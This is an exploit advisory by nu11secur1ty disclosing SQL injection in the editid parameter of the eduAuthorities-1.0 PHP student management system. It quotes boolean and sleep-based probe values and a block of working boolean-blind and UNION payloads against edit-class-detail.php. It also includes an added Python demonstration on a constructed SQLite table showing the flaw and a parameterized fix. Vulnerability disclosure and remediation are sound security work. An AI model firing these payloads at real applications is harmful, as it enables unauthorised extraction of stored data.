## https://sploitus.com/exploit?id=PACKETSTORM:179919
## Titles: eduAuthorities-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 07/29/2024  
## Vendor: https://www.mayurik.com/  
## Software:  
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The editid parameter appears to be vulnerable to SQL injection attacks. The  
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each  
submitted in the editid parameter. These two requests resulted in different  
responses, indicating that the input is being incorporated into a SQL query  
in an unsafe way. Note that automated difference-based tests for SQL  
injection flaws can often be unreliable and are prone to false positive  
results. You should manually review the reported requests and responses to  
confirm whether a vulnerability is actually present.  
Additionally, the payload (select*from(select(sleep(20)))a) was submitted  
in the editid parameter. The application took 20011 milliseconds to respond  
to the request, compared with 3 milliseconds for the original request,  
indicating that the injected SQL command caused a time delay. An attacker  
can use this vulnerability to get all information from the system!  
  
STATUS: HIGH - Vulnerability  
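
The difference-based result described above, reproduced against a constructed in-memory table beside a validated, parameterized lookup that removes it. This is an added example, not code from the advisory or from the application: SQLite stands in for MySQL, and the table, column and function names are hypothetical.

```python
import re
import sqlite3

# Constructed stand-in for the application's database: SQLite replaces MySQL,
# and the table and column names are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE classes (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO classes VALUES (?, ?)",
                   [(1, "Class A"), (2, "Class B"), (3, "Class C")])
    return db

def lookup_unsafe(db, editid):
    # Vulnerable pattern: the request value is pasted into the SQL text,
    # so anything after the number is parsed as part of the WHERE clause.
    sql = "SELECT id, name FROM classes WHERE id = " + editid
    return db.execute(sql).fetchall()

def lookup_safe(db, editid):
    # Hardened pattern: accept only a plain decimal id, then bind it as a
    # parameter so the value can never change the query structure.
    if not re.fullmatch(r"[0-9]{1,10}", editid):
        raise ValueError("editid must be a positive integer")
    return db.execute("SELECT id, name FROM classes WHERE id = ?",
                      (int(editid),)).fetchall()

def differs_unsafe(db, true_probe, false_probe):
    # The difference-based signal from the description: a true condition and
    # a false condition produce different result sets.
    return lookup_unsafe(db, true_probe) != lookup_unsafe(db, false_probe)

def rejected(db, value):
    # True when the hardened lookup refuses the value outright.
    try:
        lookup_safe(db, value)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    true_probe = "15750083 or 4189=04189"   # values quoted in the description
    false_probe = "58006253 or 7709=7710"
    print("unsafe, true condition :", lookup_unsafe(db, true_probe))
    print("unsafe, false condition:", lookup_unsafe(db, false_probe))
    print("responses differ       :", differs_unsafe(db, true_probe, false_probe))
    print("safe rejects both      :", rejected(db, true_probe), rejected(db, false_probe))
    print("safe, legitimate id    :", lookup_safe(db, "2"))
```

In the PHP application the same fix corresponds to casting or validating `editid` as an integer and using a prepared statement instead of building the query string from the request.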
  
  
[+]Exploits:  
- SQLi Multiple:  
```mysql  
---  
Parameter: #1* (URI)  
Type: boolean-based blind  
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP  
BY clause (EXTRACTVALUE)  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488  
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#  
UiVZfrom(select(sleep(3)))a)  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 3 columns  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962  
UNION ALL SELECT  
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)  
---  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)  
  
## More:  
[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)  
  
## Time spent:  
00:37:00